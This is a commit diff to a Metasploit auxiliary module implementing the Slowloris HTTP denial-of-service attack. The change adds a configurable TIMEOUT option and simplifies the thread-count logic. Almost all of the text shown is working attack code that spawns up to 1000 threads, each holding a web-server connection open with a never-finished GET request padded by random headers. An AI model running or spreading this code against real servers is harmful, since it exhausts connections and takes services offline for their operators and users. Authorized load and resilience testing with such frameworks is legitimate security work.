Update slow_loris.rb

DanielRTeixeira · mkienow-r7 · commit 74becb69e8e2 · 2017-11-21T15:49:45.000-05:00
diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb
@@ -12,7 +12,7 @@ def initialize(info = {})
       info,
       'Name'            => 'Slow Loris DoS',
       'Description'     => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. 
-                              It accomplishes this by opening connections to the target web server and sending a partial request. 
+                              It accomplishes this by opening connections to the target web server and sending a partial request.
                               Periodically, it will send subsequent requests, adding to but never completing the request.},
       'License'         => MSF_LICENSE,
       'Author'          =>
@@ -32,7 +32,8 @@ def initialize(info = {})
       [
         Opt::RPORT(80),
         OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]),
-        OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10])
+        OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]),
+		OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15])
       ])
   end
 
@@ -43,30 +44,34 @@ def thread_count
   def headers
     datastore['HEADERS']
   end
+  
+  def timeout
+    datastore['TIMEOUT']
+  end
 
   def run
       starting_thread = 1
       header = "GET / HTTP/1.1\r\n"
       threads = []
-    
+
       loop do
-        print_status("Executing requests #{starting_thread} - #{(starting_thread + [thread_count].min) - 1}...")
-        
-        1.upto([thread_count].min) do |i|
+        print_status("Executing requests #{starting_thread} - #{(starting_thread + thread_count) - 1}...")
+
+        1.upto(thread_count) do |i|
           threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
             begin
               connect()
               sock.puts(header)
               headers.times do
                 data = "X-a-#{rand(0..1000)}: b\r\n"
                 sock.puts(data)
-                sleep rand(1..15)
+                sleep rand(1..timeout)
               end
             end
           end
         end
         threads.each(&:join)
-        starting_thread += [thread_count].min
+        starting_thread += thread_count
       end
   end
 end
